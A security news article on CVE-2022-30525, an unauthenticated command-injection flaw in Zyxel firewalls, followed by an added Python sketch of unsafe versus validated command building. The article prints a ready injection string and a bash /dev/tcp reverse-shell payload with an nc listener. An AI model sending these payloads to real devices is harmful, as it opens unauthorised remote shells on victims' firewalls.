Vulnerability in Zyxel firewalls allowing code execution without authentication

A dangerous vulnerability (CVE-2022-30525) has been identified in Zyxel devices of the ATP, VPN and USG FLEX series, which are intended to provide firewall, IDS and VPN functions in enterprises. It allows an external attacker to execute code on the device without user privileges and without authentication. To carry out the attack, the attacker must be able to send requests to the device over HTTP/HTTPS. Zyxel fixed the vulnerability in firmware update ZLD 5.30. According to the Shodan service, there are currently 16213 potentially vulnerable devices on the global network that accept requests over HTTP/HTTPS.

Exploitation is carried out by sending specially crafted commands to the web handler /ztp/cgi-bin/handler, which is reachable without authentication. The problem stems from the lack of sanitisation of request parameters when commands are executed on the system through the os.system call used in the lib_wan_settings.py library, which runs when the setWanPortSt operation is processed.

For example, an attacker can pass the string "; ping 192.168.1.210;", which will cause the command "ping 192.168.1.210" to be executed on the system. To obtain access to a command shell, one can run "nc -lvnp 1270" on one's own system and then initiate a reverse connection by sending a request to the device with '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
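The bug class described above (a request parameter interpolated into an os.system() string) beside the hardened pattern a defender would expect, as an added example that is not Zyxel's code and not the contents of lib_wan_settings.py. The command string, the parameter name "mtu", the interface name "wan1" and the check_request_params() helper are assumptions made for illustration only.

```python
import re

# Characters a POSIX shell would interpret inside an interpolated argument.
_SHELL_META = re.compile(r"[;&|`$<>\n]")

def has_shell_metachars(value: str) -> bool:
    """True if a parameter value carries shell metacharacters."""
    return bool(_SHELL_META.search(value))

def build_command_unsafe(mtu: str) -> str:
    """Hypothetical reconstruction of the unsafe pattern: the parameter is
    dropped straight into a command string, so a value such as
    "1500; ping 192.168.1.210" becomes a second shell command. (Assumed
    command and interface name; never pass the result to os.system.)"""
    return f"ifconfig wan1 mtu {mtu}"

# Hardened version: allow-list the parameter, then build an argv list that
# subprocess.run(argv) can execute with no shell involved at all.
_MTU_RE = re.compile(r"[0-9]{3,4}")

def validate_mtu(value: str) -> int:
    """Accept only a 3-4 digit decimal MTU inside a sane range."""
    if not _MTU_RE.fullmatch(value):
        raise ValueError(f"rejected mtu value: {value!r}")
    mtu = int(value)
    if not 576 <= mtu <= 9000:
        raise ValueError(f"mtu out of range: {mtu}")
    return mtu

def build_argv_safe(mtu: str) -> list:
    """Validated value goes into an argument list, not a shell string."""
    return ["ifconfig", "wan1", "mtu", str(validate_mtu(mtu))]

def check_request_params(params: dict) -> list:
    """Hypothetical pre-handler check: return the names of parameters whose
    values contain shell metacharacters, for rejection and logging."""
    return [name for name, values in params.items()
            if any(has_shell_metachars(v) for v in values)]
```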

source: budenet.ru
